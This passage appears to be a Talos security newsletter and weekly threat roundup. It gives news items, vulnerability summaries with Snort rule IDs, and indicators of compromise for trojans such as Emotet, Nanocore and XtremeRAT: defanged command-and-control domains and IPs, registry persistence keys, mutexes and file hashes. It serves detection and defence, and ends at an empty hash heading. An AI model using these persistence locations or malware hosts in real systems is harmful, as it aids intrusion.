  • The FBI attempted to install a backdoor on mobile devices sold by an encrypted cellular company. Phantom Secure, which is known for selling encrypted phones to some drug cartel members, was later shut down in 2018 for data leaks and its connection to criminal operations. 
  • Many popular smart TV manufacturers collect and sell users’ viewing habits and other personal information, including their IP address. 
  • Australia believes China is behind an attack from earlier this year on its parliament and three largest political parties. However, leaders there have been reticent to publicly call China out at the risk of disrupting Australia’s economy. 
  • A global cyber security trade group suspended Huawei from its board. Huawei blamed the United States for the disruption, saying American influence led the group to making this decision. 
  • New banking regulations in Europe could leave financial institutions more open to cyber attacks, according to a new report. Known as “Open Banking,” these new policies are aimed at giving customers more control over the information they share with banks, but it also brings third-party financial technology companies into the fold. 

Notable recent security issues

Title: Remote code execution vulnerability in some AMD Radeon cards 
Description: A line of AMD Radeon cards contains a remote code execution vulnerability in their ATIDXX64.DLL driver. AMD produces the Radeon line of hardware, which includes graphics cards and graphics processing units. This specific vulnerability exists on the Radeon RX 550 and the 550 Series while running VMWare Workstation 15. An attacker could exploit this vulnerability by supplying a malformed pixel shared inside the VMware guest operating system to the driver. This could corrupt memory in a way that would allow the attacker to gain the ability to remotely execute code on the victim machine.
Snort SIDs: 49978, 49979 (Written by Tim Muniz)

Title: Atlassian Jira service contains multiple vulnerabilities, including remote JavaScript execution
Description: Atlassian’s Jira software contains multiple vulnerabilities that could allow an attacker to carry out a variety of actions, including the disclosure of sensitive information and the remote execution of JavaScript code. Jira is a piece of software that allows users to create, manage and organize tasks and manage projects. These bugs could create a variety of scenarios, including the ability to execute code inside of Jira and the disclosure of information inside of tasks created in Jira, including attached documents.
Snort SIDs: 50110, 50111 (Written by Amit Raut), 50114 (Written by Josh Williams)

Most prevalent malware files this week

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

SHA 256: 26da22347f1d91f6ca56b7c47644a776b72251d3de11c90d9fd77556d5236f5e 
MD5: f6f6039fc64ad97895142dc99554e971
Typical Filename: CSlast.gif
Claimed Product: N/A
Detection Name: W32.26DA22347F-100.SBX.TG

SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
MD5: db69eaaea4d49703f161c81e6fdd036f
Typical Filename: xme32-2141-gcc.exe
Claimed Product: N/A
Detection Name: W32.46B241E3D3-95.SBX.TG

SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
Typical Filename: sayext.gif
Claimed Product: N/A
Detection Name: W32.093CC39350-100.SBX.TG

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: mf2016341595.exe
Claimed Product: N/A
Detection Name: W32.Generic:Gen.22fz.1201 

Threat Roundup for September 13 to September 20

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 13 and Sept. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.


For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
The most prevalent threats highlighted in this roundup are:
Threat NameTypeDescription
Win.Dropper.Ursnif-7171615-0 Dropper Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
Win.Malware.Zusy-7171614-1 Malware Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Malware.Nanocore-7171596-1 Malware Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Malware.Emotet-7171351-0 Malware Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019.
Win.Trojan.XtremeRAT-7170522-1 Trojan XtremeRAT is a remote access trojan active since 2010 that allows the attacker to eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been used by similar RATs.
Win.Downloader.Upatre-7170342-1 Downloader Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware.
Win.Trojan.Gh0stRAT-7170222-1 Trojan Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Packed.Blackshades-7168564-1 Packed Blackshades is a prevalent trojan with many capabilities including logging keystrokes, recording video from webcams, and downloading and executing additional malware.
Win.Ransomware.Cerber-7168312-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns this is no longer the case.

Threat Breakdown

Win.Dropper.Ursnif-7171615-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\IAM
Value Name: Server ID
20
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: appmmgmt
20
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Install
20
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Scr
20
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Client
20
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Temp
20
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
20
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
20
MutexesOccurrences
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}20
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}20
Local\{B1443895-5CF6-0B1E-EE75-506F02798413}20
{A7AAF118-DA27-71D5-1CCB-AE35102FC239}20
{5B703C72-FEE9-4509-E0BF-12491463668D}20
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
104[.]20[.]0[.]8510
104[.]20[.]1[.]8510
216[.]218[.]185[.]1621
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]ietf[.]org20
networkinpreinformation[.]in20
Files and or directories createdOccurrences
%APPDATA%\Mozilla\Firefox\Profiles\1lcuq8ab.default\prefs.js20
\{4BC230AC-2EB3-B560-90AF-42B9C45396FD}20
%APPDATA%\ds32mapi20
%APPDATA%\ds32mapi\dhcpxva2.exe20
%TEMP%\<random, matching [A-F0-9]{3,4}>20
%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat20

File Hashes

11319f1628f825ee4d742eba134c1ef13f8c1a8347ecc58c9307631b1cf976f9 294b4d3a2a266b214d08237057231398e90db1c615470ed79e965ac2cf2f3f41 3828b71130a42ba1300b528c38d29217adbea7439f125a1ad8ccdaba210fa8f1 410391bb11c0ba164309a084cdcde503a9d88eac9cff7db37c1bb093e8e28f35 46b011edbfc2c0bc67f2e0220c475d78d26d792b16b66dbebef5b21c4a8b0f9e 7712f643f1f23f42e2bb3aa8de85f79641b4e8217b6411729f1edfa59057821a 8cb87415a2b184915ce8fd746e9322e4ffceb01c3f92ea0399c94c65394418fd 9046f36247c7cae4170c0e96c5e7e977ee8a3080ca8bcad90082be29684e4469 9a77b01056bd9fad89171f8917305ad10fa10bd38dac4646de194bd24b8e6894 a017725c2c204c738d0f50f60954d5450102e4414508493a704303ae8f6e7513 bb2cede8c20d3b8a4b404d153dcfcd3076d24e11a5c6d83e6a28b1de92db8c1f c34de7caf7fcda02d8c6de4cdbc7e92f16111e7de26b353f4025f4f16b21fa30 c611a64861e798aabf93ae732a457ff451c9deeabb6d63ee7dfd543ad084e6af c6ed641a2900c11e90c547a79c2e3a01dcb5d8dab1f8b59ee086c06f0375c566 d24a338a3d34c23ce0f7e053d9b3f7a5d442ce2330ed67887c45ce94a683ff69 d8916bb5c067fb78f96cad273e79e71c642040f81c9430c6c5ed852f0fe028ba da953a7b6829d0bf48220aed2f4c4b7498bba47d451f6b9065f6b302ef595da7 deb5817310aafedceddcab3d9ec44728aa46d68f840f177369cd717824936f58 ed12000dfd566a0b18e5fe8789bdcb2a2d121556445ac1cd4506f0aa4de6bb2a f4f92fe38729a0c7b2378e2c8c0970ce7ebd18590b59b57c2134e4021fec1a1b

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Malware.Zusy-7171614-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: DA81EF4C
8
MutexesOccurrences
DA81EF4C11
\BaseNamedObjects\7E1FD1947
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
216[.]218[.]185[.]1627
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
insamertojertoq[.]cc11
yxjsibeugmmj[.]com7
Files and or directories createdOccurrences
%HOMEPATH%\AppData\LocalLow\DA81EF4C8
%APPDATA%\DA81EF4C8
%APPDATA%\DA81EF4C\bin.exe8
%APPDATA%\7E1FD194\bin.exe7

File Hashes

08663c9807b4d858fece615d7e7f132379a7c5652cacbf6584e9adbfd3b6654e 200867228d35c8f4cef7a014221e41c3232fde37f9119c8fa8d30d1121542002 32d41afc1fa28125eb77360dc293184ab6c56ad4259740fef05649f1fcefa82a 3fb0877ce9376e5756ccc847681ccd20a72673655c24814e879556d5ea3e7283 40f210bce6a972939fa3b6874d73d6fb96c654d51cc98464ef87df6002f69f21 a0c05cd49cfd545f35985f45d386a7efcc745a3f87a759b3a94e0dcf864fa60e a2312f676b9b508693f3605549b8ff33286ad61511f4a0a589ef5abeb125b24d aa658c20abd212e39434eb31193c32f09ad39454fa88e242976b619f0681d825 ba39439230cdae8c0f0777cb5a8c0d78a825e4a2820f5da439b2f1ce0d4f3522 bd672bc43098f150874d6d691465eaea12314cb9134deec98525c39cce699fb8 d38a938e9a36c1cdcc1bbe2cf8a5da54b7572a94a37e1b0c0911b6d77d975f0a

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Malware.Nanocore-7171596-1

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: AGP Manager
25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Form1staf
25
MutexesOccurrences
Global\{d7ce90e9-f292-46be-8e05-be37399391d6}25
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
185[.]244[.]31[.]23225
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
kennethecheazu[.]ddns[.]net25
Files and or directories createdOccurrences
%SystemRoot%\win.ini25
%ProgramFiles(x86)%\AGP Manager25
%ProgramFiles(x86)%\AGP Manager\agpmgr.exe25
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C525
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs25
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator25
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat25
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\AGP Manager\agpmgr.exe25
%TEMP%\Form1TIPPE.exe25
%TEMP%\Form1TIPPE.vbs25
%APPDATA%\8F793A96-DA80-4751-83F9-B23D8B735FB1\run.dat18
%ProgramFiles%\SCSI Host\scsihost.exe18

File Hashes

186e0067550d5d1833c08c7dfd7d91e71d4d5e7d426ef3c7d1edce0554c6424c 202203455899333d624e633917a16b94ddf96eb6a03f284074aab4c1ed0c2218 3bb79bf9626bcf40d81afc303045cb4eb4267ffedee15840179aec2c50eeb82c 4c41af943d2a84a6644933e35e96342dd6195b7b9a33f6fb68c6b92949018e0a 5a1713269673c62544ea6f2a2b266d5df4ed331f1570b0dfc4aa33b3e79c5ce5 601e562e6ea29842ad3ddb246ad5f45250641d2502178c476bbefa19b3acb4e1 6d9d22a3cd4855e3673acbee8619ed213b0e330e6a4560976dda878b5101daec 73470e418c1a73792c06354c7b6d43b615d7ab246e0cff0d5dffbb2725bbfb64 76399c26a09d5953f2349c2c529fc74344160fbc639089dcab56c8409fe2bab5 8f3b8987dd405be851f06d6589ac9f9b9669ff60f5ca29e5eaa698fdd59259ef 8f54b0cb0c575486dd8ea255400b96c0d9c5f48cdf4023f6ffea59004847b627 973e1c1d3d264e764f374dc679852f27913f5afce497fa4d605118ab4e8e41d2 99f095cbbb7919e8fff151eb5175de2680b26dc94f91806343a2b48fce853f8a b46d3a615cc5d6f7ebd553c36edb963aacca5f98a271a1b91411b0b2254d4c64 c33f9cdc0fb36fd7147c15adcd46ab375138f87defedee87600270530380fbbb c4b21c6b8d558fab52a7035e290050132a3011bca864357bfdca398e61ae0ee8 ca9bec90dc6c5084d486e1b19870a9faf0d8f2571802abd08d8156a99eb1d249 cfc11408c01c5fd5eea0f19fca3a6e761d12f2173b6b3c1fd992bb7127e407a8 d1bb9db8ba25c30346a47d50956f71de7015488d8a86630bd18740df485d46fd e3baec6c7f8bc621d76b4d928e7fe3738b9703d7886a1e5ed7968700c3907ce6 ea5c81219c7ff4e8a9fce2aaf6e553a1aa5fdfb59a19d427acd66d08e82306e2 edcfb40ef3fbe25d5ea5e7606933277b35924205c67fc8898065ad9ca26354a1 f6e98bf8216f833b1dd152150e7155c0c639d6a0323d8f7d738bd27673f5ce1b fa32101dcf6a77b32d23cc08ccdff496442b983e4233bed1f4e7d6ad0a4d8f8c fc13c2128949b11b45166489ff26970989d4dc12a456f22cbad00847c069a4a0
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
Wsa N/A

Screenshots of Detection

AMP


ThreatGrid




Win.Malware.Emotet-7171351-0

Indicators of Compromise

Registry KeysOccurrences
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: ProxyEnable
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: ProxyServer
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: ProxyOverride
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: AutoConfigURL
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
Value Name: AutoDetect
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
Value Name: WpadDecisionReason
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
Value Name: WpadDecision
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
Value Name: WpadNetworkName
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}
Value Name: WpadDetectedUrl
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
Value Name: CachePrefix
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
Value Name: CachePrefix
18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
Value Name: CachePrefix
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
Value Name: ErrorControl
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
Value Name: ImagePath
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
Value Name: DisplayName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
Value Name: WOW64
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED
Value Name: ObjectName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\STARTEDTURNED 18
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80
Value Name: WpadDecisionReason
1
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80
Value Name: WpadDecision
1
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\84-62-7E-AD-21-80
Value Name: WpadDetectedUrl
1
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\96-2B-A6-19-07-4C
Value Name: WpadDecisionReason
1
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\96-2B-A6-19-07-4C
Value Name: WpadDecision
1
MutexesOccurrences
Global\I98B68E3C18
Global\M98B68E3C18
PEM19C18
\BaseNamedObjects\PEM57018
PEM74817
\BaseNamedObjects\Global\M3C28B0E414
\BaseNamedObjects\PEM29814
\BaseNamedObjects\Global\I3C28B0E414
PEM4A010
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
104[.]236[.]185[.]2518
82[.]78[.]228[.]5718
187[.]207[.]188[.]24818
211[.]229[.]116[.]9718
190[.]146[.]86[.]1804
190[.]117[.]206[.]1534
186[.]3[.]188[.]741
190[.]146[.]214[.]851
190[.]15[.]198[.]471
187[.]188[.]166[.]1921
88[.]215[.]2[.]291
Files and or directories createdOccurrences
%System32%\Microsoft\Protect\S-1-5-18\User\Preferred18
%ProgramData%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c518
%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{4,19}'>.exe18
%System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e88-f6c8d68fdc7a1
%System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-8613-c59bb06aee081
%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-aa11-7d33abe498b71
%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a10-4233abe498b71
%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a1c-4d33abe498b71
%System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-b610-299ab06aee081
%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a12-7333abe498b71
%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a13-7333abe498b71
%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-9a13-4d33abe498b71
%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a10-f332abe498b71
%System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e87-cac8d68fdc7a1
%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-8a1c-f332abe498b71
%System32%\Microsoft\Protect\S-1-5-18\User\f3586ead-3071-4253-961f-f89bb06aee081
%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-aa1f-7833abe498b71
%System32%\Microsoft\Protect\S-1-5-18\User\a07db9f3-b1b9-4044-8e89-c6c8d68fdc7a1
%System32%\Microsoft\Protect\S-1-5-18\User\aa4abc56-c89f-45fc-ba10-4133abe498b71

File Hashes

5c5acd7e82fb19bfa8a9759c1fc51e93acffb579661fc9b4455fa2f87fd05089 77cbf599e26ac6f094a75c9f3c5d15e4b53bcf9415ddecaa6d91854f16c3b19d b681565893796b7147bdeeabae464bf847ac52118ba86752f9b4e31497f7d088 c24216d6f195da529874a5db11c969abeadf873379c79a92759ad7378811b2e5 c379f58194bd325c7a5c95dd0d764f10781f4380586853bfe11a5ceb1d3e5aeb cc848b89bb84b0c6ae96d7191c415dcacf542aed4b2a610a0cf6b77047d7b3ef d626aacbbd26f0c7d5baee7fd6e49ee8ae2aed7c6352d39ac25134e9985400c6 d8199db09a16c0f851cb3dde4fc06183d23650295836d1a24c4d868af5acc7e3 d86584f92b6af0bfde4a4720878d5ad64f6d8c295b61f5cc345b2fcfa952758e de3841cd0ab0001fdfd28a4f3fd15d5d20c09629f7857642083e95fa9b716364 e4edfd2654acbab633fbd862641abd852cf3568614b7596373c6c4951e063998 ee21917b1596852818813250aa9a5ee37e87f7ca43120e17f09f940d058c1557 f2dcd182c3a281ee4b0026f6267fb1fafd27ae3f656941464363e4d1c0d68a28 f60672c54ec0ba38a7c7200f75859b811e1c589f84c693a82125350f89d15c94 f75984cfa2bb3c33629e71565da34a8af4b087acf91a19b1dca7481d7adff22b fcb2b44ce9f1646c1f33a82ed4afa47874166ca0c3842773d1e64fbe603de847 fce9a64d721296eaacbc034526c0719e5628575b25456436664d69cfc4155485 fe7983bcbdb91a3cfa96e68bc57ae13007041e7f048f92372a6488da79c93af7

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid




Win.Trojan.XtremeRAT-7170522-1

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKLM
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKCU
15
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
Value Name: InstalledServer
14
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 14
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13} 6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5S3M304I-21OR-7PJ2-WFYP-365WFB8ILY13}
Value Name: StubPath
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48}
Value Name: StubPath
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{766867P2-2ICN-NQ0P-3VWT-3XW6E42YHP48} 5
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'>
Value Name: ServerStarted
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{K66YL0K3-XDEE-5AWY-0K06-EI7W1R701BL3}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{K66YL0K3-XDEE-5AWY-0K06-EI7W1R701BL3} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V1V7S53C-K2F0-6KCB-18UG-1IS4RLL44I6B} 1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{V1V7S53C-K2F0-6KCB-18UG-1IS4RLL44I6B}
Value Name: StubPath
1
<HKCU>\SOFTWARE\ASDAF2DS3F 1
<HKCU>\SOFTWARE\ASDAF2DS3F
Value Name: ServerStarted
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{5460C4DF-B266-909E-CB58-E32B79832EB2}
Value Name: StubPath
1
<HKCU>\SOFTWARE\ASDAF2DS3F
Value Name: InstalledServer
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6U3FL100-6U8B-5472-CPGO-7O4P7G8N8UO7}
Value Name: StubPath
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6U3FL100-6U8B-5472-CPGO-7O4P7G8N8UO7} 1
MutexesOccurrences
XTREMEUPDATE15
2H8xgwYEXIT9
1nGM3R2HW6
1nGM3R2HWPERSIST6
\BaseNamedObjects\SHuJ5a0JNEXIT5
\BaseNamedObjects\SHuJ5a0JNPERSIST5
\BaseNamedObjects\SHuJ5a0JN5
2H8xgwYPERSIST3
2H8xgwY3
asdaf2ds3f1
asdaf2ds3fPERSIST1
asdaf2ds3fEXIT1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
192[.]169[.]69[.]2511
186[.]80[.]214[.]751
181[.]136[.]96[.]201
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
lili3030[.]duckdns[.]org6
thork13[.]duckdns[.]org4
explocion[.]ddns[.]net1
toyota[.]duckdns[.]org1
master254781[.]ddns[.]net1
TAVO11[.]DDNS[.]NET1
Files and or directories createdOccurrences
%TEMP%\iJune22.exe15
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\iJune22.lnk15
\~WELK\TLO.dll10
\~WELK10
%HOMEPATH%\Start Menu\Programs\Startup\iJune22.lnk8
%APPDATA%\Microsoft\Windows\1nGM3R2HW.dat6
%APPDATA%\Microsoft\Windows\1nGM3R2HW.cfg6
%SystemRoot%\Hewlett6
%SystemRoot%\Hewlett\world.exe6
%APPDATA%\Microsoft\Windows\SHuJ5a0JN.cfg5
%APPDATA%\Microsoft\Windows\SHuJ5a0JN.dat5
%SystemRoot%\chrome\google.exe5
\~GGFD5
\~GGFD\VDF.dll5
%SystemRoot%\chrome5
%TEMP%\x.html4
%SystemRoot%\InstallDir3
%APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.dat3
%APPDATA%\Microsoft\Windows\<random, matching '[a-zA-Z0-9]{5,9}'>.cfg3
%SystemRoot%\InstallDir\Server.exe2
%APPDATA%\Microsoft\Windows\SHuJ5a0JN.xtr1
%SystemRoot%\SysWOW64\System321
%SystemRoot%\SysWOW64\System32\DELL1.exe1
%APPDATA%\Microsoft\Windows\asdaf2ds3f.dat1
%APPDATA%\Microsoft\Windows\asdaf2ds3f.cfg1
*See JSON for more IOCs

File Hashes

